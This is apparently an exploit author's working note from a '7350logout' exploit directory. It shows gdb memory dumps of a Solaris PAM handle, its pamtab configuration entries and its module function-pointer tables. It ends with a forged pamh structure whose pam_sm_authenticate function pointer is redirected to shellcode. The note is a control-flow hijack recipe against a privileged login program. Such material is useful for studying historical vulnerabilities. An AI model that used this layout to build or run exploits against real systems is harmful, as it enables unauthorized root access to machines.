path: root/exploits/7350logout/pam.txt
blob: a62e46465d3ff25d34649362ceb3cc30645d1139 (plain)

pamh points here:



(gdb) x/256wx 0x29278
struct pam_item ps_item[PAM_MAX_ITEMS = 64]; (64 * 8 bytes = 0x200 bytes)
0x29278:        0x00000000      0x00000000      0x00028db0      0x00000005
0x29288:        0x00000000      0x00000000      0x0002b2a8      0x0000000a
0x29298:        0x00028e40      0x00000000      0x00028dd0      0x00000008
0x292a8:        0x00000000      0x00000000      0x00000000      0x00000000
0x292b8:        0x00000000      0x00000000      0x00028e50      0x00000007
0x292c8:        0x00000000      0x00000000      0x00000000      0x00000000
0x292d8:        0x00000000      0x00000000      0x00000000      0x00000000
0x292e8:        0x00000000      0x00000000      0x00000000      0x00000000
0x292f8:        0x00000000      0x00000000      0x00000000      0x00000000
0x29308:        0x00000000      0x00000000      0x00000000      0x00000000
0x29318:        0x00000000      0x00000000      0x00000000      0x00000000
0x29328:        0x00000000      0x00000000      0x00000000      0x00000000
0x29338:        0x00000000      0x00000000      0x00000000      0x00000000
0x29348:        0x00000000      0x00000000      0x00000000      0x00000000
0x29358:        0x00000000      0x00000000      0x00000000      0x00000000
0x29368:        0x00000000      0x00000000      0x00000000      0x00000000
0x29378:        0x00000000      0x00000000      0x00000000      0x00000000
0x29388:        0x00000000      0x00000000      0x00000000      0x00000000
0x29398:        0x00000000      0x00000000      0x00000000      0x00000000
0x293a8:        0x00000000      0x00000000      0x00000000      0x00000000
0x293b8:        0x00000000      0x00000000      0x00000000      0x00000000
0x293c8:        0x00000000      0x00000000      0x00000000      0x00000000
0x293d8:        0x00000000      0x00000000      0x00000000      0x00000000
0x293e8:        0x00000000      0x00000000      0x00000000      0x00000000
0x293f8:        0x00000000      0x00000000      0x00000000      0x00000000
0x29408:        0x00000000      0x00000000      0x00000000      0x00000000
0x29418:        0x00000000      0x00000000      0x00000000      0x00000000
0x29428:        0x00000000      0x00000000      0x00000000      0x00000000
0x29438:        0x00000000      0x00000000      0x00000000      0x00000000
0x29448:        0x00000000      0x00000000      0x00000000      0x00000000
0x29458:        0x00000000      0x00000000      0x00000000      0x00000000
0x29468:        0x00000000      0x00000000      0x00000000      0x00000000

pamtab * pam_conf_info[PAM_NUM_MODULE_TYPES = 4]; (4 * 4 bytes = 0x10 bytes)
0x29478:        0x000295c0      0x00029638      0x00029700      0x000296b0

0x29488:        0x0002b2d8	; struct pam_module_data *ssd;
0x2948c:        0x00028e70	; fd_list * fd;
0x29490:        0x00000000	; env_list * pam_env;
0x29494:        0x00000000	; char * pam_client_message_version_number;


pamtab, pam_conf_info[0]:
		"login"		AUTH		REQUIRED	"/usr/lib/security/pam_unix.so.1"
0x295c0:        0x00028de0      0x00000000      0x00000001      0x000295e8
0x295d0:        0x00000000      0x00000000      0x00028e60      0x00029610

pamtab, pam_conf_info[1]:
		"login"		ACCOUNT		REQUISITE	"/usr/lib/security/pam_roles.so.1"
0x29638:        0x00028e10      0x00000001      0x00000008      0x0002a038
0x29648:        0x00000000      0x00000000      0x00000000      0x00029660

pamtab, pam_conf_info[2]:
		"other"		PASSWORD	REQUIRED	"/usr/lib/security/pam_unix.so.1"
0x29700:        0x00028e30      0x00000002      0x00000001      0x00029728
0x29710:        0x00000000      0x00000000      0x00000000      0x00000000

pamtab, pam_conf_info[3]:
		"other"		SESSION		REQUIRED	"/usr/lib/security/pam_unix.so.1"
0x296b0:        0x00028e20      0x00000003      0x00000001      0x000296d8
0x296c0:        0x00000000      0x00000000      0x00000000      0x00000000


pam_conf_info[0]->function_ptr:
0x28e60:        0xef4d4a70      0x00000000      0x00000009      0x00000000
0x28e70:        0xef6f060c      0x00028e90      0x00000009      0x00000000
0x28e80:        0xef4b091c      0x00000000      0x00000009      0x00000000
0x28e90:        0xef6f0c50      0x00000000      0x00000009      0x00000000
0x28ea0:        0x00028eb0      0xefffb1f0      0x00000009      0x00000000
0x28eb0:        0x00000000      0x00000000      0x00000009      0x00000000



pamh ->
	[512 * NULL]	ps_item, ps_item[2] = { "foo", 3 }
	[pameptr]	pam_conf_info[0] (AUTH)
	[3 * NULL]	pam_conf_info[1-3]
	[NULL]		ssd
	[NULL]		fd
	[NULL]		pam_env
	[NULL]		pam_client_message_version_number

pameptr ->
	[NULL]		pam_service
	[NULL]		pam_type
	[NULL]		pam_flag
	[NULL]		module_path
	[NULL]		module_argc
	[NULL]		module_argv
	[pamfptr]	function_ptr

pamfptr ->
	[entry]		pam_sm_authenticate()

entry -> shellcode